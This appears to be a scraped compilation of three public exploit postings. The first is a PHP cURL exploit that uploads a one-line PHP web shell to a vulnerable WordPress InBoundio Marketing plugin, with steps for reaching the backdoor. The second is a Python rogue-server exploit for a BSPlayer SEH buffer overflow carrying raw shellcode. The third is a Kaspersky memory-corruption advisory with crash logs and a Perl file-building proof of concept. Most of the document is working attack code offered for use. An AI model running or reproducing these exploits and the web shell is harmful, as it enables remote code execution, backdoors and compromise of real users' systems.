#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#     *----------------------------*      #
#  K  |....##...##..####...####....|  .   #
#  h  |....#...#........#..#...#...|  A   #
#  a  |....#..#.........#..#....#..|  N   #
#  l  |....###........##...#.....#.|  S   #
#  E  |....#.#..........#..#....#..|  e   #
#  D  |....#..#.........#..#...#...|  u   #
#  .  |....##..##...####...####....|  r   #
#     *----------------------------*      #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
# >>    D_x . Made In Algeria . x_Z    << #
###########################################
#
# [>] Title : WordPress plugin (InBoundio Marketing) Shell Upload Vulnerability
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : File Upload / Code Exec
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [!] Vendor : http://www.inboundio.com
#
###########################################
#
# [!] Description :
#
# Wordpress plugin InBoundio Marketing v1.0 is suffer from File/Shell Upload Vulnerability
# remote attacker can upload file/shell/backdoor and exec commands.
#
####
# Lines (6... to 20) : csv_uploader.php
####
#
# ExpLO!T : 
# -------

$postData = array();
$postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;)

$dz = curl_init();
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($dz, CURLOPT_POST, 1);
curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );
curl_setopt($dz, CURLOPT_TIMEOUT, 0);
$buf = curl_exec ($dz);
curl_close($dz);
unset($dz);
echo $buf;

/*
[!] creat your shell file =>
 _ k3dz.php :

 <?php system($_GET['dz']); ?>
 
[>] Post the exploit 
[+] Find you'r backdoor : ../inboundio-marketing/admin/partials/uploaded_csv/k3dz.php?dz=[ CMD ]
[+] Or upload what you whant ^_^ ...

*/

####
#  <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
#  Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , 
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & 
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;
####

# REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-inboundio-marketing.html

?>
HireHackking 
#!/usr/bin/python

''' Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.
In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full
address and then used backward jumping to jump to a long jump that eventually land in my shellcode.

Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try :)

My twitter: @fady_osman
My youtube: https://www.youtube.com/user/cutehack3r
'''

import socket
import sys
s = socket.socket()         # Create a socket object
if(len(sys.argv) < 3):
  print "[x] Please enter an IP and port to listen to."
  print "[x] " + sys.argv[0] + " ip port"
  exit()
host = sys.argv[1]	    # Ip to listen to.
port = int(sys.argv[2])     # Reserve a port for your service.
s.bind((host, port))        # Bind to the port
print "[*] Listening on port " + str(port)
s.listen(5)                 # Now wait for client connection.
c, addr = s.accept()        # Establish connection with client.
# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
print(('[*] Sending the payload first time', addr))
c.recv(1024)
#seh and nseh.
buf =  ""
buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a"
buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94"
buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01"
buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5"
buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7"
buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f"
buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7"
buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34"
buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80"
buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3"
buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5"
buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5"
buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c"
buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15"
buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c"
buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22"
buf += "\x8c\xcd\x11\xc2\x37\x12"

jmplong = "\xe9\x85\xe9\xff\xff"
nseh = "\xeb\xf9\x90\x90"
# Partially overwriting the seh record (nulls are ignored).
seh = "\x3b\x58\x00\x00"
buflen = len(buf)
response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000
c.send(response)
c.close()
c, addr = s.accept()        # Establish connection with client.
# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
print(('[*] Sending the payload second time', addr))
c.recv(1024)
c.send(response)
c.close()
s.close()
HireHackking 
source: https://www.securityfocus.com/bid/51161/info

Kaspersky Internet Security and Anti-Virus are prone to a local memory-corruption vulnerability.

A local attacker can exploit this issue to cause the affected application to crash, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible; this has not been confirmed. 

Title:
======
Kaspersky IS&AV 2011/12 - Memory Corruption Vulnerability


Date:
=====
2011-12-19


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=129


VL-ID:
=====
129


Introduction:
=============
Kaspersky Internet Security 2011 has everything that you need to stay safe and secure while you re surfing the web. 
It provides constant protection for you and your family – whether you work, bank, shop or play online.

Kaspersky Anti-Virus 2011 – the backbone of your PC’s security system, offering real-time automated protection from 
a range of IT threats. Kaspersky Anti-Virus 2011 provides the basic tools needed to protect your PC. Our award-winning 
technologies work silently in the background while you enjoy your digital life.

(Copy of Vendor Homepage: http://www.kaspersky.com/kaspersky_anti-virus  &&  http://www.kaspersky.com/kaspersky_internet_security)


Abstract:
=========
Vulnerability-Lab Team discovered a Memory & Pointer Corruption Vulnerability on Kaspersky Internet Security 2011/2012 & Kaspersky Anti-Virus 2011/2012.


Report-Timeline:
================
2010-12-04:	Vendor Notification
2011-01-16:	Vendor Response/Feedback
2011-12-19:	Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================

Exploitation-Technique:
=======================
Local


Severity:
=========
Medium


Details:
========
A Memory Corruption vulnerability is detected on Kaspersky Internet Security 2011/2012 &  Kaspersky Anti-Virus 2011/2012. 
The vulnerability is caused by an invalid pointer corruption when processing a corrupt .cfg file through the kaspersky exception filters, 
which could be exploited by attackers to crash he complete software process. 
The bug is located over the basegui.ppl & basegui.dll when processing a .cfg file import.


Vulnerable Modules: 

			[+] CFG IMPORT


Affected Version(s):
Kaspersky Anti-Virus 2012 & Kaspersky Internet Security 2012
KIS 2012 v12.0.0.374
KAV 2012 v12.x

Kaspersky Anti-Virus 2011 & Kaspersky Internet Security 2011
KIS 2011 v11.0.0.232 (a.b)
KAV 11.0.0.400
KIS 2011 v12.0.0.374

Kaspersky Anti-Virus 2010 & Kaspersky Internet Security 2010


--- Kaspersky Bug Logs ---

Folder:                  ../Analyses/Crash Reports (KIS&KAV)

KAV.11.0.0.232_08.04_22.24_3620.GUI.full.dmp
KAV.11.0.0.232_08.04_22.24_3620.GUI.mini.dmp
KAV.11.0.0.232_08.04_22.24_3620.GUI.tiny.dmp

KAV.11.0.0.232_08.04_22.28_2956.GUI.full.dmp
KAV.11.0.0.232_08.04_22.28_2956.GUI.mini.dmp
KAV.11.0.0.232_08.04_22.28_2956.GUI.tiny.dmp

KAV.11.0.0.232?_08.04_23.21_3712.GUI.full.dmp
KAV.11.0.0.232?_08.04_23.21_3712.GUI.mini.dmp
KAV.11.0.0.232?_08.04_23.21_3712.GUI.tiny.dmp

KAV.11.0.0.232?_08.04_23.54_2640.GUI.full.dmp
KAV.11.0.0.232?_08.04_23.54_2640.GUI.mini.dmp
KAV.11.0.0.232?_08.04_23.54_2640.GUI.tiny.dmp

Reference(s): 
				../Analyses/Crash Reports (KIS&KAV)/kav_x32.rar
				../Analyses/Crash Reports (KIS&KAV)/kis_x32-win7.zip
				../Analyses/Crash Reports (KIS&KAV)/kis_x64.zip

		

--- Service Crash Report Queue Logs ---

Folder: ../Analyses/Crash Reports (Service)

AppCrash_avp.exe_1d98841adaefc9689cba9c4bbd7
AppCrash_avp.exe_434b4962a0ccbccd3c2a6bd5f95
AppCrash_avp.exe_583f849d49fe1a714c9bd02ba4e
AppCrash_avp.exe_5f09d49c257b515e08a6defbf11
AppCrash_avp.exe_69cb355e72347419436f047a313
AppCrash_avp.exe_69cb355e72347419436f047a313
AppCrash_avp.exe_a7a7fe58d34d13f0136d933e977
AppCrash_avp.exe_d21fe6df9c207eac2d8c6bcacad
AppCrash_avp.exe_d2c8cf27ba2a3f6ceaad6c44327
AppCrash_avp.exe_ed94bb914e255192b71d1257c19


Version=1
EventType=APPCRASH
EventTime=129256270253026260
ReportType=2
Consent=1
UploadTime=129256270260076663
ReportIdentifier=d70927a2-a1d7-11df-81a1-95fa4108d4d6
IntegratorReportIdentifier=d70927a1-a1d7-11df-81a1-95fa4108d4d6
WOW64=1
Response.BucketId=1985200055
Response.BucketTable=1
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=avp.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=11.0.1.400
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=4c2cd011
Sig[3].Name=Fehlermodulname
Sig[3].Value=basegui.ppl
Sig[4].Name=Fehlermodulversion
Sig[4].Value=11.0.1.400
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=4c2cd193
Sig[6].Name=Ausnahmecode
Sig[6].Value=c0000005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=00079c3c
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.1.7600.2.0.0.768.3
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=0a9e
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=0a9e372d3b4ad19135b953a78882e789
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=0a9e
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=0a9e372d3b4ad19135b953a78882e789
UI[2]=C://Program Files (x86)/Kaspersky Lab/Kaspersky Internet Security 2011/avp.exe
UI[3]=Kaspersky Anti-Virus funktioniert nicht mehr
UI[4]=Windows kann online nach einer Lösung für das Problem suchen und versuchen, das Programm neu zu starten.
UI[5]=Online nach einer Lösung suchen und das Programm neu starten
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
UI[7]=Programm schließen
LoadedModule[0]=C:/Program Files (x86)/Kaspersky Lab/Kaspersky Internet Security 2011/avp.exe
LoadedModule[1]=C://Windows/SysWOW64/ntdll.dll
LoadedModule[2]=C://Windows/syswow64/kernel32.dll
LoadedModule[3]=C:/Windows/syswow64/KERNELBASE.dll
...
...
LoadedModule[148]=C://Windows//SysWOW64//WMVCore.DLL
LoadedModule[149]=C://Windows////SysWOW64//WMASF.DLL
LoadedModule[150]=C://Windows//////SysWOW64////EhStorAPI.dll
LoadedModule[151]=C://Program Files (x86)//Internet Explorer//ieproxy.dll
LoadedModule[152]=C://Windows//SysWOW64//SAMLIB.dll
State[0].Key=Transport.DoneStage1
State[0].Value=1
State[1].Key=DataRequest
State[1].Value=Bucket=1985200055/nBucketTable=1/nResponse=1/n
FriendlyEventName=Nicht mehr funktionsfähig
ConsentKey=APPCRASH
AppName=Kaspersky Anti-Virus
AppPath=C://Program Files (x86)//Kaspersky Lab//Kaspersky Internet Security 2011//avp.exe




--- System Crash Report Queue Logs ---

Folder:		Analyses//Crash Reports (System)

WER7A62.tmp.appcompat.txt
WER7FFE.tmp.mdmp
WER6127.tmp.WERInternalMetadata.xml



--- Exception Log ---
(a50.ee8): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=0331e7bc ecx=9699eef0 edx=6ddf9ba0 esi=00000002 edi=00000000
eip=76f900ed esp=0331e76c ebp=0331e808 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202




--- Debug Logs ---
FAULTING_IP: 
basegui+79bed
6ddf9bed 8b11            mov     edx,dword ptr [ecx]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 6ddf9bed (basegui+0x00079bed)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 9699eef0
Attempt to read from address 9699eef0

PROCESS_NAME:  avp.exe

FAULTING_MODULE: 755b0000 kernel32
DEBUG_FLR_IMAGE_TIMESTAMP:  4c4f15cf
MODULE_NAME: basegui
ERROR_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgef hrt werden.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgef hrt werden.
EXCEPTION_PARAMETER1:  00000000
EXCEPTION_PARAMETER2:  9699eef0

READ_ADDRESS:  9699eef0 

FOLLOWUP_IP: 
basegui+79bed
6ddf9bed 8b11            mov     edx,dword ptr [ecx]

FAULTING_THREAD:  00000ee8
BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS:  INVALID_POINTER_WRITE
DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE
LAST_CONTROL_TRANSFER:  from 6ddf9bfd to 6ddf9bed

STACK_TEXT:  
0331f9b8 6ddf9bfd 0331fa54 02485068 00000001 basegui+0x79bed
0331f9f0 6ddf9bfd 0331fa54 02485068 00000001 basegui+0x79bfd
0331fa28 6de5bd10 0331fa54 02485068 00000001 basegui+0x79bfd
0331fa48 6de33ad0 0331fa54 000001f6 000001c2 basegui!DllUnregisterServer+0x12580
0331fa5c 6de34320 00000200 00000000 01c201f6 basegui+0xb3ad0
0331fa9c 6de34d45 000504b4 00000200 00000000 basegui+0xb4320
0331fae0 6de33fdd 000504b4 00000200 00000000 basegui+0xb4d45
0331fb30 754c6238 00000000 00000200 00000000 basegui+0xb3fdd
0331fb5c 754f12a1 02bb0fb0 000504b4 00000200 user32!gapfnScSendMessage+0x270
0331fbd8 754f10e2 0059afd4 02bb0fb0 000504b4 user32!SendNotifyMessageW+0x341
0331fc28 754f11e7 00a06c90 00000000 00000200 user32!SendNotifyMessageW+0x182
0331fc48 754c6238 000504b4 00000200 00000000 user32!SendNotifyMessageW+0x287
0331fc74 754c68ea 754f11be 000504b4 00000200 user32!gapfnScSendMessage+0x270
0331fcec 754c7d31 0059afd4 76db3908 000504b4 user32!gapfnScSendMessage+0x922
0331fd4c 754c7dfa 76db3908 00000000 0331fd88 user32!LoadStringW+0x11f
0331fd5c 754e2292 0331fe18 00000000 0331fe18 user32!DispatchMessageW+0xf
0331fd88 754e70a9 000504b4 00000000 02485048 user32!IsDialogMessageW+0x11e
0331fdb0 6de2e50b 000504b4 0331fe18 023d9be8 user32!IsDialogMessage+0x58
0331fdcc 6de20c1c 0331fe18 74113b90 00000000 basegui+0xae50b
0331fdfc 6de231a8 0331fe18 7411383c 02e260ec basegui+0xa0c1c
0331fe50 6de07dbc 00000000 005e8228 6ddd6f8c basegui+0xa31a8
0331fe64 72da3487 00000003 00000000 005e8244 basegui+0x87dbc


STACK_COMMAND:  ~5s; .ecxr ; kb
SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  basegui+79bed
FOLLOWUP_NAME:  MachineOwner
IMAGE_NAME:  basegui.ppl
BUCKET_ID:  WRONG_SYMBOLS
FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_basegui.ppl!Unknown
WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/avp_exe/11_0_0_232/4be3cfb6/basegui_ppl/11_0_0_241/4c4f15cf/c0000005/00079bed.htm?Retriage=1

Followup: MachineOwner
---------
0:005> lmvm basegui
start    end        module name
6dd80000 6df19000   basegui    (export symbols)       basegui.ppl
    Loaded symbol image file: basegui.ppl
    Image path: C://Program Files (x86)//Kaspersky Lab//Kaspersky Internet Security 2011//basegui.ppl
    Image name: basegui.ppl
    Timestamp:        Tue Jul 27 19:22:23 2010 (4C4F15CF)
    CheckSum:         0019E22D
    ImageSize:        00199000
    File version:     11.0.0.241
    Product version:  11.0.0.241
    File flags:       0 (Mask 3F)
    File OS:          40004 NT Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Kaspersky Lab ZAO
    ProductName:      Kaspersky Anti-Virus
    InternalName:     BASEGUI
    OriginalFilename: BASEGUI.DLL
    ProductVersion:   11.0.0.241
    FileVersion:      11.0.0.241
    FileDescription:  Kaspersky Anti-Virus GUI Windows part
    LegalCopyright:   Copyright © Kaspersky Lab ZAO 1997-2010.
    LegalTrademarks:  Kaspersky Anti-Virus ®  is registered trademark of Kaspersky Lab ZAO.
0:005> .exr 0xffffffffffffffff
ExceptionAddress: 6ddf9bed (basegui+0x00079bed)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 9699eef0
Attempt to read from address 9699eef0


Information:
The kaspersky .cfg file import exception-handling filters wrong or manipulated file imports like one this first test ... (wrong-way.png).
The PoC is not affected by the import exception-handling & get through without any problems. A invalid pointer write & read allows
an local attacker to crash the software via memory corruption. The technic & software to detect the bug in the binary is prv8.

Notice:
An local attacker do not need to know any passwords to load a .cfg (Configuration) file. (access-rights.png)


Folder:			
                                                ../Analyses/Debug


References(Pictures):
						../appcrash1.png
						../appcrash2.png
						../appcrash3.png
						../appcrash4.png
						../appcrash5.png
						../debug&exception.png
						../kav2011.png
						../reproduce-x32.png
						../wrong-way.png
						../access-rights.png


Proof of Concept:
=================
The vulnerability can be exploited by local attackers via import or remote attacker via user inter action. 
For demonstration or reproduce ...


#!/usr/bin/perl
##############################################################################
my $code="corrupt" x 1;
###################################################################
$FH1 = "file1";
$FilePath1 = "part1.bin";
$FH2 = "file2";
$FilePath2 = "part2.bin";
###################################################################
open(myfile,'>> poc_pwn.cfg');
binmode myfile;
###################################################################
open(FH1, $FilePath1);
binmode FH1;
while (<FH1>) {
         print myfile;
      }
 close(FH1);
print myfile $code;
open(FH2, $FilePath2);
binmode FH2;
while (<FH2>) {
         print myfile;
      }
close(FH2);
###################################################################


PoC:			
			../PoC/kis&kav_2011_2012_p0c.pl
			../PoC/part1.bin
			../PoC/part2.bin


Risk:
=====
The security risk of the bug/vulnerability is estimated as medium(+).


Credits:
========
Vulnerability Research Laboratory - Benjamin K.M. (Rem0ve)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

    						Copyright © 2011|Vulnerability-Lab